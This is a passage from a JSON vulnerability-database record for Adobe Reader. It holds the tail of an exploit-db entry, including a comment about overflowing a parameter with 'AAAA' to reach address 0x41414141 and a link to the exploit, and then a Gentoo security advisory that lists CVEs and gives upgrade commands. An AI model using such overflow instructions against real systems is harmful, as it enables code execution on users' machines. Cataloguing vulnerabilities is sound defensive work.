Place a very long 'AAAA' at the second param to go to 0x41414141 ;)\n}\n\n}\n\n//############################\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8570/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader is a PDF reader released by Adobe. \n\n### Description\n\nMultiple vulnerabilities have been reported in Adobe Reader: \n\n * Alin Rad Pop of Secunia Research reported a heap-based buffer overflow in the JBIG2 filter (CVE-2009-0198). \n * Mark Dowd of the IBM Internet Security Systems X-Force and Nicolas Joly of VUPEN Security reported multiple heap-based buffer overflows in the JBIG2 filter (CVE-2009-0509, CVE-2009-0510, CVE-2009-0511, CVE-2009-0512, CVE-2009-0888, CVE-2009-0889) \n * Arr1val reported that multiple methods in the JavaScript API might lead to memory corruption when called with crafted arguments (CVE-2009-1492, CVE-2009-1493). \n * An anonymous researcher reported a stack-based buffer overflow related to U3D model files with a crafted extension block (CVE-2009-1855). \n * Jun Mao and Ryan Smith of iDefense Labs reported an integer overflow related to the FlateDecode filter, which triggers a heap-based buffer overflow (CVE-2009-1856). \n * Haifei Li of Fortinet's FortiGuard Global Security Research Team reported a memory corruption vulnerability related to TrueType fonts (CVE-2009-1857). \n * The Apple Product Security Team reported a memory corruption vulnerability in the JBIG2 filter (CVE-2009-1858). \n * Matthew Watchinski of Sourcefire VRT reported an unspecified memory corruption (CVE-2009-1859). \n * Will Dormann of CERT reported multiple heap-based buffer overflows when processing JPX (aka JPEG2000) stream that trigger heap memory corruption (CVE-2009-1861). 
\n * Multiple unspecified vulnerabilities have been discovered (CVE-2009-2028). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted document, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-8.1.6\"", "modified": "2009-07-12T00:00:00", "published": "2009-07-12T00:00:00", "id": "GLSA-200907-06", "href": "https://security.gentoo.org/glsa/200907-06", "type": "gentoo", "title": "Adobe Reader: User-assisted execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}